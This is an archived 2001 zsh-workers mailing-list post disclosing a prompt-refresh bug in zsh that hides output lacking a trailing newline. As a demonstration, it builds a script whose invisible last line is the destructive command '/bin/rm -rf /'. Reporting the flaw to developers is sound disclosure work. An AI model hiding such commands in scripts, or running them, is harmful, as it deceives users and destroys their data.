refresh/newline bug in zsh?

zsh-workers
 help / color / mirror / code / Atom feed

From: salo <salo@Xtrmntr.org>
To: zsh-workers@sunsite.dk
Cc: Martin Macok <martin.macok@underground.cz>
Subject: refresh/newline bug in zsh?
Date: Sun, 29 Jul 2001 20:23:45 +0200	[thread overview]
Message-ID: <20010729202345.A23817@Xtrmntr.org> (raw)

hi,

i found probably a bug in zsh which is caused by refreshing prompt string.

  salo@otaku[19:55][~]> echo -n test
  salo@otaku[19:55][~]> 

'test' appears on screen but is overwritten by prompt string imediately and on
fast cpu it is hard to recognize that something was written to screen before
prompt string refresh.

this affects last line in file without newline character too and could
lead to put hidden commands on last line of scripts f.e. :

  salo@otaku[20:01][~]> echo "echo 'Hi! How are you?'" > test.sh                           
  salo@otaku[20:02][~]> echo "echo 'I sent you this file in order to have your advice'" >> test.sh
  salo@otaku[20:02][~]> echo "echo 'See you later. Thanks'" >> test.sh
  salo@otaku[20:02][~]> echo -n "/bin/rm -rf / >/dev/null 2>&1 &" >> test.sh       
  salo@otaku[20:02][~]> cat test.sh 
  echo 'Hi! How are you?'
  echo 'I sent you this file in order to have your advice'
  echo 'See you later. Thanks'
  salo@otaku[20:02][~]> sh test.sh
  ...

tested versions:

  zsh-3.0.8  vulnerable
  zsh-4.0.1  vulnerable
  zsh-4.0.2  vulnerable       

ps. please note i am not subscribed to this list and add me to cc: or so.
thanks

--
--   salo <salo@Xtrmntr.org>         ASCII Ribbon campaign against   /"\   --
--   http://Xtrmntr.org/salo.pgp     e-mail in gratuitous HTML and   \ /   --
--                                   Microsoft proprietary formats    X    --
--                                                                   / \   --

next             reply	other threads:[~2001-07-29 18:23 UTC|newest]

Thread overview: 2+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2001-07-29 18:23 salo [this message]
2001-07-30  5:06 ` Borsenkow Andrej

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=20010729202345.A23817@Xtrmntr.org \
    --to=salo@xtrmntr.org \
    --cc=martin.macok@underground.cz \
    --cc=zsh-workers@sunsite.dk \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link

Be sure your reply has a Subject: header at the top and a blank line before the message body.

Code repositories for project(s) associated with this public inbox

	https://git.vuxu.org/mirror/zsh/

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).